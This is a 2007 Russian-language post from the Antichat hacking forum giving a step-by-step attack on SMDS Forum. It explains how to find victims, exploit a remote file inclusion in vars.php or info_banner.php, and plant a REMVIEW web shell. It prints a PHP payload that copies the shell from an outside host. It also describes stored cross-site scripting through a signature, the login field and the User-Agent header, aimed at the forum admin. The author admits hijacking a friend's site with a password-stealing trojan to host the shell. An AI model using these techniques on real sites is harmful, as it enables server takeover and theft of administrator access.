ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу заливка шелла в SMDS Forum
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

заливка шелла в SMDS Forum
  #1  
Старый 17.09.2007, 02:20
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию заливка шелла в SMDS Forum
Нашёл статейку интересную про уязвимость в этом (SMDS), хоть и мало используемом, форуме. Дырка находится в файле vars.php и позволяет без труда загрузить шелл, если на сервере разрешён инклуд URL. Для начала - ищем нашу жертву. Нашли? Читаем дальше.
Проверяем на предмет разрешения доступа к файлу vars.php - заходим по ссылке адрес_форума/vars.php. Естественно, если доступ закрыт - будет ошибка 403. А если открыт - куча ошибок PHP.
Среди них - одна ВАЖНАЯ:
Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.;C:\php5\pear') in C:\AppServ\www\forum\vars.php on line 110
Берём исходник скрипта и видим строку (кому лень искать исходник - говорю, что она там ЕСТЬ ):
include "$file_directories";
При этом эта переменная нигде выше не задаётся в этом файле.
Заходим по ссылке адрес_форума/vars.php?file_directories=URL_до_скрипта
По заданной URL для удобства должен находиться файл РНР (сразу говорю - хостинг НЕ должен поддерживать РНР!) вида:
PHP код:
PHP код:
<?php
copy ("http://deathteam.clan.su/remview.php","remview.php");
//Копируем шелл (задайте ссылку. По той ссылке - шелл REMVIEW.
//Сайт не мой, а друга.
//Я его взломал - трояном пароль угнал и залил туда шелл специально для таких вещей.
//Сайт на Укозе - нет поддержки РНР. То что нам и надо.)
?>
Всё. Если доступ к файлу vars.php закрыт - пробуем то же самое с файлом info_banner.php.
Только на этот раз - с переменной $file_read_statistic. Думаю, понятно.
Если и к этому файлу закрыт доступ - можно просто наделать гадостей админу форума...
Берём и регистрируемся на форуме, а в подписи пишем
</textarea>
<script language="JavaScript">
Наш скрипт...
</script>
И начинаем постить фигню на форуме, чтоб вынудить админа залезть в админку и удалить этого юзера. Как только он зайдёт туда - скрипт заработает. Или при авторизации написать скрипт в поле "Логин" - только кодировать его надо так, чтоб не было кавычек. Они там вырезаются. Этот скрипт сработает, если админ полезет смотреть логи удачных/неудачных авторизаций на форуме. Если нет - пишем скрипт строке User-Agent в Фаерфоксе и лазим им по форуму (изменить можно зайдя по адресу about:config). Тогда скрипт сработает при просмотре логов входа на главную.
Вот такая вот фигня. (Написал, потому что многие этого не знают и пишут мне с вопросами типа "как сломать СМДС форум?". Понимаю, что им почти не пользуются, но мало ли...)

(С)Eu_gen2007
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SMDS Forum v.2.1 remote file inclusion The_HuliGun Форумы 0 01.09.2007 17:58
Заливка шелла в Мамбо с правами админа gibson Комментарии к видео 5 30.05.2007 23:35
Заливка шелла, взлом сайта. Sulf aka Joker Болталка 2 03.07.2006 23:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ